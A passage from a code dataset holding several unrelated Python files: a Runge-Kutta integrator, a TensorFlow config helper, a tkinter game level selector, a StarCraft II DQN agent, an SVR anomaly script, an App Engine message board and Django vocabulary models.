(lam*rho*cos(psi) + 1 - omega**2 - \n (2 - omega**2)*(q1**2 + 3*q2**2) - 6*omega*q1*q2)\n\n A = array([[0,0,1,-1,0,0],\n [a_32,0,0,0,0,0],\n [a_42,0,0,0,0,1],\n [-a_31,0,0,0,0,-1],\n [-a_41,0,0,0,0,0],\n [0,-a_41,a_31,-a_42,a_32,0]])\n #u_x = A*u\n u_x = (A - sigma*eye(6)).dot(u)\n return(u_x)\n\n###############################################################################\n#Runge-Kutta integrator for the xi interval\ndef xi_RK4(u_init,lam,sigma,time,step):\n #create storage array for trajectory\n traj = zeros([len(time),len(u_init)],complex)\n traj[0,:] = u_init\n\n #integrate up to xi_end\n for i in range(len(time)-1):\n k1 = u_xi(time[i],traj[i,:],lam,sigma)\n temp = traj[i,:] + (step/2.0)*k1\n k2 = u_xi(time[i]+(step/2.0),temp,lam,sigma)\n temp = traj[i,:] + (step/2.0)*k2\n k3 = u_xi(time[i]+(step/2.0),temp,lam,sigma)\n temp = traj[i,:] + step*k3\n k4 = u_xi(time[i]+step,traj[i,:],lam,sigma)\n traj[i+1,:] = traj[i,:] + (step/6.0)*(k1+2.0*k2+2.0*k3+k4)\n \n return(traj)\n\n###############################################################################\n\ndef theta_integration(theta,s,xi_interval,xi_step):\n s\n present_s = s\n next_s = s + delta \n last_s = s - delta\n \n present_lambda = lambda_0 + r*exp(1j*present_s) \n next_lambda = lambda_0 + r*exp(1j*(next_s)) \n last_lambda = lambda_0 + r*exp(1j*(last_s))\n\n lam= present_lambda\n p = 2*omega + lam*rho*(sin(psi))\n tau = 1 - omega**2 + lam*rho*cos(psi)\n sigma = (sqrt(2))*(sqrt(tau + sqrt(tau**2 + p**2)))\n present_sigma = sigma\n present_ksi_plus = [2*sigma, -2*p, sigma**2, -(sigma**2), -2*p,\n sigma*(sigma**2 - 2*tau) ]\n \n lam= next_lambda\n p = 2*omega + lam*rho*(sin(psi))\n tau = 1 - omega**2 + lam*rho*cos(psi)\n sigma = (sqrt(2))*(sqrt(tau + sqrt(tau**2 + p**2)))\n next_sigma = sigma\n next_ksi_plus = [2*sigma, -2*p, sigma**2, -(sigma**2), -2*p,\n sigma*(sigma**2 - 2*tau) ]\n \n lam= last_lambda\n p = 2*omega + lam*rho*(sin(psi))\n tau = 1 - omega**2 + lam*rho*cos(psi)\n sigma = (sqrt(2))*(sqrt(tau + sqrt(tau**2 + p**2)))\n last_sigma = sigma\n last_ksi_plus = [2*sigma, -2*p, sigma**2, -(sigma**2), -2*p,\n sigma*(sigma**2 - 2*tau) ]\n \n next_u = xi_RK4(next_ksi_plus,next_lambda,\n next_sigma,xi_interval,xi_step)\n\n u = xi_RK4(present_ksi_plus,present_lambda,\n present_sigma,xi_interval,xi_step)\n\n last_u = xi_RK4(last_ksi_plus,last_lambda,\n last_sigma,xi_interval,xi_step)\n\n u_s = (next_u[-1,:] - last_u[-1,:])/(2*delta)\n\n theta_s = imag(conj(u[-1,:])*(u_s))/real(conj(u[-1,:])*u[-1,:])\n \n return(theta_s)\n\n###############################################################################\n\ntheta = odeint(theta_integration, 0, sspan, args = (xi_interval,xi_step))\ntheta = theta/(2*pi)\n\nprint(theta)","sub_path":"HS-Pulse/integration_at_L_prime_HSpulse.py","file_name":"integration_at_L_prime_HSpulse.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"435698467","text":"\"\"\"Utility functions related to distributed training executor setup.\"\"\"\nimport json\nimport logging\nimport os\nimport tensorflow as tf\n\nCHIEF = 'chief'\nEVALUATOR = 'evaluator'\nWORKER = 'worker'\nPARAMETER_SERVER = 'ps'\nLOCAL_MODE = 'local'\n\n\ndef get_executor_task_type():\n \"\"\"Get executor task type (chief/evaluator/worker/ps or local) from TF_CONFIG.\"\"\"\n tf.logging.info(\"Getting executor context info...\")\n tf_config = os.environ.get(\"TF_CONFIG\")\n\n # With multiworker training, tf_config contains tasks in the cluster, and each task's type in the cluster.\n # To get ther worker/evaluator status, need to fetch corresponding fields in the config (json format).\n # Read more at https://www.tensorflow.org/guide/distributed_training#setting_up_tf_config_environment_variable\n if tf_config:\n tf_config_json = json.loads(tf_config)\n\n # Logging the status of current worker/evaluator\n logging.info(\"Running with TF_CONFIG: {}\".format(tf_config_json))\n task_type = tf_config_json.get('task', {}).get('type')\n logging.info(\"=========== Current executor task type: {} ==========\".format(task_type))\n return task_type\n else:\n logging.info(\"=========== No TF_CONFIG found. Running {} mode. ==========\".format(LOCAL_MODE))\n return LOCAL_MODE\n","sub_path":"src/detext/utils/executor_utils.py","file_name":"executor_utils.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"584051007","text":"import tkinter\r\nfrom tkinter import ttk\r\nfrom pickle import dump, load\r\nimport os\r\n\r\nfrom envGenerators import higtmap\r\nfrom renderer.mainRender import renderEngine\r\nfrom pawns.panda import PandaPawn\r\nfrom editor.pythonEditor import editor\r\n\r\nlevel = None\r\n\r\nclass levelSelector(tkinter.Tk):\r\n \"\"\"tk window to select window\r\n\r\n a tk window used to get the level the user wants to play as well as initating the discriptor of the level in its txt box\r\n\r\n sublcass tk\r\n \"\"\"\r\n def __init__(self):\r\n tkinter.Tk.__init__(self)\r\n \"initaite supercalss tk\"\r\n self.title(\"pyplaygrounds level selector\")\r\n\r\n selector = tkinter.Label(self, text=\"plz select a level\")\r\n selector.pack() \r\n\r\n levles = load(open(f\"{os.path.dirname(os.path.abspath(__file__))}/envGenerators/levelData/allLevels.p\",\"rb\"))\r\n # load the currently finisched levels from file\r\n self.selector = ttk.Combobox(self, values = levles)\r\n \"\"\"slect witch level\r\n\r\n a combobox to select witch level to load\r\n \"\"\"\r\n self.selector.bind(\"<>\", self.levelSelecotValueChanged)\r\n self.selector.pack()\r\n\r\n self.discriptionBox = tkinter.Text(self)\r\n \"\"\"what the level is about\r\n\r\n a txt widget that discribes what the level is all about\r\n \"\"\"\r\n self.discriptionBox.pack()\r\n\r\n self.executeLevel = tkinter.Button(self, text = \"play\", command=self.runFunction)\r\n \"\"\"run the level\r\n\r\n a button widet that is used to initate the level\r\n \"\"\"\r\n self.executeLevel.pack()\r\n\r\n \r\n def levelSelecotValueChanged(self, *vals):\r\n \"\"\"called when a level is selected by tk\"\"\"\r\n self.loadLevelDoc(self.selector.get(), self.discriptionBox)\r\n \r\n @staticmethod\r\n def loadLevelDoc(level, discriptionBox):\r\n \"\"\"load the level doc saved as a txt file and render it to a text box\r\n\r\n @param level: the level to load from\r\n @type level: int\r\n \"\"\"\r\n discriptionBox.delete('1.0',tkinter.END)\r\n #load the doc\r\n with open(f\"{os.path.dirname(os.path.abspath(__file__))}/envGenerators/levelData/level{level}/doc.txt\") as f:\r\n data = f.read().splitlines()\r\n for line in data:\r\n discriptionBox.insert(tkinter.END, line)\r\n discriptionBox.insert(tkinter.END, \"\\n\")\r\n\r\n def runFunction(self):\r\n \"\"\"run the level\r\n\r\n deconstruct this widget and initiate the level\r\n \"\"\"\r\n global level\r\n level = self.selector.get()\r\n self.quit()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n selector = levelSelector()\r\n \"the selectorwidget\"\r\n selector.mainloop()\r\n\r\n hmap = higtmap.higthmap(level)\r\n \"the higtmat that was selected\"\r\n engine = renderEngine(hmap)\r\n \"the renderengine to run on\"\r\n hmap.setEngine(engine)\r\n\r\n CurrentEditor = editor(engine, hmap)\r\n \"the edutior to write script in\"\r\n #____________execute script\r\n #deconstructor\r\n","sub_path":"pyplaygrounds/levelSelector.py","file_name":"levelSelector.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115453781","text":"import random\nimport time\nimport sc2\nimport torch\n\nfrom sc2 import Race, Difficulty\nfrom sc2.constants import *\nfrom sc2.player import Bot, Human\nfrom sc2.unit_command import UnitCommand\nfrom sc2.position import Point2, Point3\n\nfrom FeatureRGB import UnitFeature\nfrom Net import DQN\nfrom Macro import Macro\n\nLOAD_MODEL = True\nMODEL_NAME = '0000250.pt'\n\nclass RLAgent(sc2.BotAI):\n\n # Features\n f_unit = None\n net = None\n macro = None\n\n # variables for RL\n obs = None\n\n def __init__(self):\n self.macro = Macro(self)\n\n self.available_actions = ['NO_OP', 'TRAIN_SCV', 'TRAIN_MARINE', 'BUILD_SUPPLYDEPOT', 'BUILD_BARRACK']\n self.require_position = [False, False, False, True, True]\n\n self.DQN = DQN(100 , len(self.available_actions))\n\n self.prev_obs = None\n self.prev_a = None\n self.prev_score = 0\n\n self.g_episode = 0\n\n # Variables for reward shaping\n self.prev_collected_minerals = 0\n self.prev_collected_minerals_efficiency = 0\n\n if LOAD_MODEL:\n self.DQN.load(MODEL_NAME)\n\n\n def on_start(self):\n self._client.game_step = 23\n\n '''\n Variables\n s = prev_obs\n a = prev_a\n r = ?? # 지금은 sparse reward\n s' = obs\n done # 시나리오 끝날 때 되면 done 수동처리 및 환경리셋\n '''\n async def on_step(self, iteration):\n if self.state.player_result:\n self.prev_obs = None\n self.prev_a = None\n self.prev_score = 0\n self.prev_collected_minerals = 0\n self.prev_collected_minerals_efficiency = 0\n\n self.DQN.global_episode += 1\n print('global_episode : %6d\\t|\\tglobal_step : %10d\\t|\\taccum_reward : %5d\\t|\\tepsilon : %.2f' % (self.DQN.global_episode, self.DQN.global_step, self.state.score.score, self.DQN.epsilon))\n\n await self._client.reset()\n\n if self.DQN.global_episode % 50 == 0:\n try:\n self.DQN.save()\n except:\n pass\n await self.macro.default_action()\n\n self.DQN.global_step += 1\n\n # Reward for Parameter\n collected = self.state.score.collected_minerals - self.prev_collected_minerals\n param_r = 0\n if collected < self.prev_collected_minerals_efficiency:\n param_r = -1\n\n # Reward for Action\n action_r = self.state.score.score - self.prev_score\n\n obs = self.state.feature['render']['unit_type']\n unit_feature = UnitFeature(feature_map=obs)\n obs = unit_feature.dataset\n\n action, param = self.DQN.get_action(obs)\n\n\n if self.prev_obs is not None:\n self.DQN.push_to_buffer(self.prev_obs, self.prev_a, action_r, param_r, obs)\n\n if self.DQN.global_step > 10000 and len(self.DQN.replay_buffer) > 100:\n self.DQN.train()\n\n if self.DQN.global_step % 10000 == 0:\n self.DQN.update_target()\n\n self.prev_obs = obs\n self.prev_a = action\n self.prev_param = param\n self.prev_score = self.state.score.score\n self.prev_collected_minerals = self.state.score.collected_minerals\n self.prev_collected_minerals_efficiency = collected\n\n q_value = self.DQN.get_probs(obs)\n debug = 'NO_OP \\t\\t' + str(q_value[0]) + '\\nTRAIN_SCV \\t\\t' + str(q_value[1]) + '\\nTRAIN_MARINE \\t\\t' + str(q_value[2]) + '\\nBUILD_SUPPLYDEPOT\\t\\t' + str(q_value[3]) + '\\nBUILD_BARRACK \\t\\t' + str(q_value[4]) + '\\nACTION_REWARD \\t\\t' + str(action_r) + '\\nPRAM_REWARD \\t\\t' + str(param_r) + '\\nMEMORY \\t\\t' + str(len(self.DQN.replay_buffer))\n self._client.debug_text_2d(text=debug, pos=Point2((0.05, 0.3)), size=14)\n await self._client.send_debug()\n\n try:\n await self.macro.run(action, param)\n except:\n pass\n\n\n\n def on_end(self, result):\n pass\n\n\n\n\ndef main():\n\n sc2.run_game(sc2.maps.get(\"BuildMarines_bugfix\"), [\n Bot(Race.Terran, RLAgent())\n ], realtime=False\n )\n '''\n sc2.run_game(sc2.maps.get(\"BuildMarines\"), [\n Human(Race.Terran)\n ], realtime=True\n )\n '''\n\nif __name__ == '__main__':\n main()\n","sub_path":"RL/RLAgent.py","file_name":"RLAgent.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"324499138","text":"import numpy as np\nfrom sklearn.svm import SVR\nimport matplotlib.pyplot as plt\nimport datetime\nimport random\nimport time\nimport operator\nimport sys\narg = sys.argv[1]\nfnov = open('../data/Nov Data.csv', 'r')\nfoct = open('../data/Oct Data.csv', 'r')\nline = foct.readline()\nline = foct.readline()\nvals = []\narg1 =-1\nif arg == \"mon\":\n arg1 = 0\nelif arg == \"tue\":\n arg1 = 1\nelif arg == \"wed\":\n arg1 = 2\nelif arg == \"thur\":\n arg1 = 3\nelif arg == \"fri\":\n arg1 = 4\nelif arg == \"sat\":\n arg1 = 5\nelif arg == \"sun\":\n arg1 = 6\nxdates = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]\n \ninput_vector = []\ninput_vector2 = []\noutput_vector = []\noutput_vector2 = []\nyo1 = []\nyo2 = []\n\nvals = []\nlc_cnt =2\nwhile line:\n arr = line.split(',')\n if 0 == 0:\n dt =datetime.datetime.strptime(arr[2],\"%m/%d/%y %H:%M\")\n #timeInSec = time.mktime(dt.timetuple())\n temp = arr[10]\n holiday = int(arr[11])\n features = []\n features = features + [dt.weekday()]\n features = features + [dt.hour]\n features = features + [int(temp)]\n features = features + [int(holiday)]\n input_vector = input_vector + [features]\n output_vector = output_vector + [arr[8]]\n \n line = foct.readline()\n \nfoct.close()\n\nline = fnov.readline()\nline = fnov.readline()\n\nwhile line:\n arr = line.split(',')\n if 0 == 0:\n dt =datetime.datetime.strptime(arr[2],\"%m/%d/%y %H:%M\")\n #timeInSec = time.mktime(dt.timetuple())\n temp = arr[10]\n holiday = int(arr[11])\n features = []\n yo1 = yo1 + [dt.toordinal()]\n features = features + [dt.weekday()]\n features = features + [dt.hour]\n features = features + [int(temp)]\n features = features + [int(holiday)]\n input_vector2 = input_vector2 + [features]\n output_vector2 = output_vector2 + [arr[8]]\n \n line = fnov.readline()\n \nfnov.close()\n\nsvr_rbf = SVR(kernel='rbf', C=200, gamma=0.1)\nprint(input_vector2)\ny_rbf = svr_rbf.fit(input_vector, output_vector).predict(input_vector2)\ni =0\nj=0\nimp = {}\nfor a in input_vector2 :\n cd =datetime.datetime.fromordinal(int(yo1[i]))\n curr_date = cd.date()\n diff = float(y_rbf[i]) - float(output_vector2[i])\n diff = diff * diff\n if curr_date in imp:\n imp[curr_date] = imp[curr_date] + diff\n else :\n imp[curr_date] = diff\n\n if cd.weekday() == arg1 :\n vals = vals + [y_rbf[i]]\n j = j+1\n \n if j == 24:\n j=0\n print (len(vals))\n plt.plot(xdates,vals,linestyle='-', color=np.random.rand(3,1),label=str(curr_date))\n vals = []\n \n i = i+1\n \n \nsorted_x = sorted(imp.items(), key=operator.itemgetter(1))\nfor key in sorted_x:\n print(key)\nplt.legend()\nplt.show()","sub_path":"python_files/anomaly2.py","file_name":"anomaly2.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"36014298","text":"#coding=utf-8\r\nfrom utility import constants\r\nimport jinja2\r\nimport os\r\nimport re\r\nimport urllib\r\nimport logging\r\nimport datetime\r\njinja_environment = jinja2.Environment(\r\n\tloader=jinja2.FileSystemLoader(os.path.dirname(__file__)))\r\n\r\nimport cgi\r\nfrom utility.datemodel import *\r\nimport webapp2\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.ext.db import stats\r\nfrom google.appengine.api import users\r\nfrom google.appengine.api import memcache\r\n\r\n\r\ndef check_email (str):\t\r\n\tp = re.compile(r\"(?:^|\\s)[-a-z0-9_.+]+@(?:[-a-z0-9]+\\.)+[a-z]{2,6}(?:\\s|$)\", re.IGNORECASE)\r\n\tif (p.search(str)):\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\ndef check_nickname (str):\r\n\t'''本来计划的是用来检查昵称是否可用\r\n\t现阶段先空着,昵称没啥好检查的'''\r\n\treturn True\r\n\t\r\nclass IndexPage(webapp2.RequestHandler):\r\n\t'''用来显示首页'''\r\n\tdef get(self):\r\n\t\ttemplate = jinja_environment.get_template('template/index.html')\r\n\t\tself.response.out.write(template.render())\r\n\r\nclass IntrPage(webapp2.RequestHandler):\r\n\t'''用来显示介绍页'''\r\n\tdef get(self):\r\n\t\ttemplate = jinja_environment.get_template('template/introduction.html')\r\n\t\tself.response.out.write(template.render())\r\n\r\nclass ContactPage(webapp2.RequestHandler):\r\n\t'''用来显示联系方式页'''\r\n\tdef get(self):\r\n\t\ttemplate = jinja_environment.get_template('template/contact.html')\r\n\t\tself.response.out.write(template.render())\r\n\r\nclass TestPage(webapp2.RequestHandler):\r\n\t'''用来显示待建设的页面'''\r\n\tdef get(self):\r\n\t\ttemplate = jinja_environment.get_template('template/underconstruction.html')\r\n\t\tself.response.out.write(template.render())\t\r\n\t\t\r\nclass MessagePage(webapp2.RequestHandler):\r\n\t'''用来显示留言板'''\r\n\tdef get(self):\r\n\t\terror_messages = [u'',\r\n\t\t\t\t\t\t\tu'请输入昵称(Please Enter a Nickname)',\r\n\t\t\t\t\t\t\tu'请输入您的邮箱(Please Enter your E-mail)',\r\n\t\t\t\t\t\t\tu'请输入您的留言内容(Please Enter the Content)',\r\n\t\t\t\t\t\t\tu'您输入的邮箱格式不合法(The E-mail Does Not Exist)']\r\n\t\ttemplate_values = {}\r\n\t\terrors= self.request.get('errors')\r\n\t\tnum = self.request.get('num') \t\t\t#指示显示第几页,用来导航\r\n\t\tcounter_total = Counter.gql('WHERE name = :1','message.total')\r\n\t\tif errors:\r\n\t\t\terrors = int (errors)\r\n\t\telse:\r\n\t\t\terrors = 0\r\n\t\t\t\r\n\t\ttemplate_values ['errors'] = errors\r\n\t\ttemplate_values ['error_message'] = error_messages[errors]\r\n\t\tif not num:\r\n\t\t\tnum = 1\r\n\t\telse:\r\n\t\t\tnum = int(num)\r\n\t\tif num <= 0:\r\n\t\t\tnum = 1\r\n\t\t\r\n\t\tif counter_total.count()==1:\r\n\t\t\tcounter_total = counter_total[0]\r\n\t\t\tpage_count_total = counter_total.value / constants.MESSAGE_PER_PAGE #计算一共有几页\r\n\t\t\tif (counter_total.value % constants.MESSAGE_PER_PAGE !=0):\r\n\t\t\t\tpage_count_total +=1\r\n\t\t\ttemplate_values ['page_count_total'] = page_count_total\r\n\t\t\tif (page_count_total ==0):\r\n\t\t\t\tfirst_num = 0\r\n\t\t\telse:\r\n\t\t\t\tif (num > page_count_total):\r\n\t\t\t\t\tnum = page_count_total\r\n\t\t\t\tfirst_num = constants.MESSAGE_PER_PAGE*(num-1)\r\n\t\t\t\t\r\n\r\n\t\t\ttemplate_values ['debug_info'] = []\r\n\t\t\ttemplate_values ['messages'] = Message.gql('ORDER BY date').fetch(constants.MESSAGE_PER_PAGE,first_num)\r\n\t\t\ttemplate_values ['num'] = num\r\n\t\t\ttemplate_values ['page_count_total'] = page_count_total\r\n\t\t\ttemplate_values ['message_per_page'] = constants.MESSAGE_PER_PAGE\r\n\t\t\t\r\n\t\ttemplate = jinja_environment.get_template(r'template/message.html')\r\n\t\tself.response.out.write(template.render(template_values))\t\r\n\t\t\t\t\t\t\t\t\t\r\n\tdef post(self):\r\n\t\terrors = 0\r\n\t\tnickname = self.request.get ('nickname').strip()\r\n\t\temail = self.request.get ('email').strip()\r\n\t\tcontent = self.request.get('content').strip()\r\n\t\t\r\n\t\tif (len(nickname) == 0):\r\n\t\t\terrors = 1\r\n\t\tif (len(email) ==0):\r\n\t\t\terrors = 2\r\n\t\tif (len(content) == 0):\r\n\t\t\terrors = 3\r\n\t\tif (not check_email(email)):\r\n\t\t\terrors = 4\r\n\t\t\r\n\t\tif (errors == 0):\r\n\t\t\tc = Counter.gql('WHERE name = :1', 'message.total')\r\n\t\t\tif (c.count() ==1):\r\n\t\t\t\tcounter_total = c[0]\r\n\t\t\t\tcounter_total.value += 1\r\n\t\t\telif (c.count() == 0):\r\n\t\t\t\tcounter_total = Counter()\r\n\t\t\t\tcounter_total.name = 'message.total'\r\n\t\t\t\tcounter_total.value = 1\r\n\t\t\telse:\r\n\t\t\t\tlogging.error ('MessagePage: post --same counter message.total--')\r\n\t\t\t\tself.response.out.write('服务器端数据库有误,相同counter')\r\n\t\t\t\treturn\r\n\t\t\r\n\t\t\t#查找原来的数据库中是否用名字叫message.total的项\r\n\t\t\t#没有就新建,有就把value项加一。\r\n\t\t\t#message.total的意思是现在一共有多少个message。这样设置是因为可能有的message会被删除。\r\n\t\t\tmessage = Message ()\r\n\t\t\tmessage.author = nickname\r\n\t\t\tmessage.content = content\r\n\t\t\tmessage.email = db.Email(email)\r\n\t\t\tmessage.date += datetime.timedelta(hours=+8)\r\n\t\t\t\r\n\t\t\tcounter_total.put()\r\n\t\t\tmessage.put()\r\n\t\t\tpage = counter_total.value / constants.MESSAGE_PER_PAGE\r\n\t\t\tif (counter_total.value % constants.MESSAGE_PER_PAGE != 0):\r\n\t\t\t\tpage +=1\r\n\t\t\tself.redirect('/message?' + urllib.urlencode({'num':page}))\r\n\t\telse:\r\n\t\t\tself.redirect('/message?' + urllib.urlencode({'errors': errors}))\r\n\r\nindexpage = webapp2.WSGIApplication([('/index', IndexPage),\r\n\t\t\t\t\t\t\t\t\t('/', IndexPage),\r\n\t\t\t\t\t\t\t\t\t('/introduction', IntrPage),\r\n\t\t\t\t\t\t\t\t\t('/contact', ContactPage),\r\n\t\t\t\t\t\t\t\t\t('/message', MessagePage),\r\n\t\t\t\t\t\t\t\t\t('/message/([0-9]+)', MessagePage),\r\n\t\t\t\t\t\t\t\t ('/.*', TestPage)\r\n\t\t\t\t\t\t\t\t\t],\r\n\t\t\t\t\t\t\t\t\tdebug=True)\r\n\t\t\t\t\t\t\t\t\t\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"373062216","text":"from django.conf import settings\nfrom django.contrib.postgres.fields import JSONField\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom core.models import (\n LanguageModel, OrderedModel, SerializeModel,\n SlugifyModel, TimestampModel, TrackedFieldModel\n)\nfrom core.utils import tag_text\nfrom .managers import (\n VocabContextManager, VocabContextEntryManager,\n VocabEntryManager, VocabSourceManager\n)\n\n\n# Abstract models\n\nclass CreatorModel(models.Model):\n creator = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n related_name=\"%(app_label)s_%(class)s\",\n on_delete=models.CASCADE\n )\n\n class Meta:\n abstract = True\n\n\nclass VocabSourceContentModel(models.Model):\n\n class Meta:\n abstract = True\n\n def get_vocab_source(self):\n raise NotImplementedError(\"Method get_source needs to be implemented.\")\n\n\nclass JsonDataModel(models.Model):\n json_data = JSONField()\n\n class Meta:\n abstract = True\n\n\n# Concrete models\n\nclass VocabEntry(\n TimestampModel, LanguageModel, SlugifyModel,\n SerializeModel, TrackedFieldModel\n):\n unique_slug = False\n value_field_name = \"entry\"\n max_iterations = 500\n tracked_fields = [\"language\", \"entry\"]\n\n entry = models.CharField(\n verbose_name=_(\"label_entry\"),\n max_length=255,\n )\n description = models.TextField(\n verbose_name=_(\"label_description\"),\n blank=True\n )\n\n objects = VocabEntryManager()\n\n class Meta:\n verbose_name = _(\"label_vocab_entry\")\n verbose_name_plural = _(\"label_vocab_entry_plural\")\n unique_together = (\"entry\", \"language\")\n\n def __str__(self):\n return self.entry\n\n def save(self, force_insert=False, force_update=False, *args, **kwargs):\n # If language or entry changed, delete related json entry\n if self.id:\n if self.field_changed(\"language\") or self.field_changed(\"entry\"):\n if VocabEntryJsonData.objects.filter(vocab_entry_id=self.id).exists():\n VocabEntryJsonData.objects.filter(vocab_entry_id=self.id).delete()\n\n super(VocabEntry, self).save(*args, **kwargs)\n\n def get_serializer(self):\n from .serializers import VocabEntrySerializer\n return VocabEntrySerializer\n\n\nclass VocabSource(\n TimestampModel, SlugifyModel, SerializeModel,\n CreatorModel\n):\n \"\"\"\n A model for vocab sources that contain the contexts.\n \"\"\"\n\n BOOK = 1\n WEBSITE = 2\n BLOG = 3\n CREATED = 4\n OTHER = 5\n SOURCE_TYPE_CHOICES = (\n (BOOK, _(\"label_source_book\")),\n (WEBSITE, _(\"label_source_website\")),\n (BLOG, _(\"label_source_blog\")),\n (CREATED, _(\"label_source_created\")),\n (OTHER, _(\"label_source_other\")),\n )\n unique_slug = True\n value_field_name = \"name\"\n max_iterations = 500\n\n name = models.CharField(\n verbose_name=_(\"label_name\"),\n max_length=255,\n )\n description = models.TextField(\n verbose_name=_(\"label_description\"),\n blank=True\n )\n source_type = models.IntegerField(\n verbose_name=_(\"label_vocab_source_type\"),\n choices=SOURCE_TYPE_CHOICES,\n default=CREATED,\n )\n\n objects = VocabSourceManager()\n\n class Meta:\n verbose_name = _(\"label_vocab_source\")\n verbose_name_plural = _(\"label_vocab_source_plural\")\n unique_together = (\"creator\", \"name\")\n\n def __str__(self):\n return self.name\n\n def get_serializer(self):\n from .serializers import VocabSourceSerializer\n return VocabSourceSerializer\n\n\nclass VocabContext(\n TimestampModel, SerializeModel,\n VocabSourceContentModel, OrderedModel\n):\n group_field = \"vocab_source_id\"\n\n vocab_source = models.ForeignKey(\n VocabSource,\n related_name=\"vocab_contexts\",\n on_delete=models.CASCADE\n )\n vocab_entries = models.ManyToManyField(\n VocabEntry,\n through=\"VocabContextEntry\",\n related_name=\"vocab_context_entry\"\n )\n content = models.TextField(\n verbose_name=_(\"label_content\"),\n )\n\n objects = VocabContextManager()\n\n class Meta:\n verbose_name = _(\"label_vocab_context\")\n verbose_name_plural = _(\"label_vocab_context_plural\")\n\n def __str__(self):\n return self.content\n\n def get_serializer(self):\n from .serializers import VocabContextSerializer\n return VocabContextSerializer\n\n def get_entries_and_tags(self):\n \"\"\"\n Returns a list of all of the context's vocab entries along with their\n corresponding tags (i.e., entry instances in the context.)\n\n Note: Consider prefetching vocabcontextentry_set in querysets to avoid multiple calls.\n \"\"\"\n entries_tags = []\n context_entries = self.vocabcontextentry_set.all()\n for context_entry in context_entries:\n vocab_entry = context_entry.vocab_entry\n entries_tags.append({\n \"vocab_entry\": {\n \"id\": vocab_entry.id,\n \"entry\": vocab_entry.entry,\n \"language\": vocab_entry.language,\n \"slug\": vocab_entry.slug\n },\n \"tags\": context_entry.get_vocab_entry_tags()\n })\n return entries_tags\n\n def get_vocab_source(self):\n return self.vocab_source\n\n\nclass VocabContextEntry(\n TimestampModel, SerializeModel, VocabSourceContentModel\n):\n vocab_entry = models.ForeignKey(\n VocabEntry,\n on_delete=models.CASCADE\n )\n vocab_context = models.ForeignKey(\n VocabContext,\n on_delete=models.CASCADE\n )\n\n objects = VocabContextEntryManager()\n\n class Meta:\n verbose_name = _(\"label_vocab_entry_context\")\n verbose_name_plural = _(\"label_vocab_entry_context_plural\")\n unique_together = (\"vocab_entry\", \"vocab_context\")\n\n def __str__(self):\n return \"vocab_entry: {0}, vocab_context: {1}\".format(\n self.vocab_entry_id,\n self.vocab_context_id\n )\n\n def get_serializer(self):\n from .serializers import VocabContextEntrySerializer\n return VocabContextEntrySerializer\n\n def get_vocab_entry_tags(self):\n \"\"\"\n Returns a list of the content of the object's VocabEntryTags.\n \"\"\"\n tags = []\n for tag in self.vocab_entry_tags.all():\n tags.append(tag.content)\n tags.sort()\n return tags\n\n def get_tagged_context(self):\n tags = self.get_vocab_entry_tags()\n tagged_text = tag_text(tags, self.vocab_context.content)\n return tagged_text\n\n def add_vocab_entry_tag(self, tag):\n VocabEntryTag.objects.create(\n vocab_context_entry=self,\n content=tag\n )\n\n def remove_vocab_entry_tag(self, tag):\n VocabEntryTag.objects.filter(\n vocab_context_entry=self,\n content=tag\n ).delete()\n\n def get_vocab_source(self):\n return self.vocab_context.vocab_source\n\n\nclass VocabContextAudio(\n TimestampModel, SlugifyModel,\n SerializeModel, VocabSourceContentModel\n):\n unique_slug = False\n slug_value_field_name = \"name\"\n slug_max_iterations = 500\n\n creator = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n related_name=\"%(app_label)s_%(class)s\",\n on_delete=models.CASCADE\n )\n vocab_context = models.ForeignKey(\n VocabContext,\n related_name=\"vocab_context_audios\",\n on_delete=models.CASCADE\n )\n name = models.CharField(\n verbose_name=_(\"label_name\"),\n max_length=255,\n )\n audio_url = models.URLField(\n verbose_name=_(\"label_audio_url\")\n )\n\n def get_serializer(self):\n from .serializers import VocabContextAudioSerializer\n return VocabContextAudioSerializer\n\n def get_vocab_source(self):\n return self.vocab_source.vocab_source\n\n\nclass VocabEntryTag(VocabSourceContentModel):\n vocab_context_entry = models.ForeignKey(\n VocabContextEntry,\n related_name=\"vocab_entry_tags\",\n on_delete=models.CASCADE\n )\n content = models.TextField(\n verbose_name=_(\"label_content\"),\n )\n\n def get_vocab_source(self):\n return self.vocab_context_entry.vocab_context.vocab_source\n\n def __str__(self):\n return self.content\n\n\nclass VocabEntryJsonData(JsonDataModel):\n OXFORD = 1\n MIRIAM_WEBSTER = 2\n COLINS = 3\n OTHER = 4\n JSON_DATA_SOURCE_CHOICES = (\n (OXFORD, _(\"label_json_data_oxford\")),\n (MIRIAM_WEBSTER, _(\"label_json_data_miriam_webster\")),\n (COLINS, _(\"label_json_data_colins\")),\n (OTHER, _(\"label_json_data_other\"))\n )\n\n vocab_entry = models.ForeignKey(\n VocabEntry,\n related_name=\"%(app_label)s_%(class)s\",\n on_delete=models.CASCADE\n )\n json_data_source = models.IntegerField(\n verbose_name=_(\"label_vocab_source_type\"),\n choices=JSON_DATA_SOURCE_CHOICES,\n default=OTHER\n )\n","sub_path":"nublado/vocab/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633776857","text":"class sortclass(object):\n def __init__(self, a):\n self.a = a\n\n def bubblesort(self):\n leng = 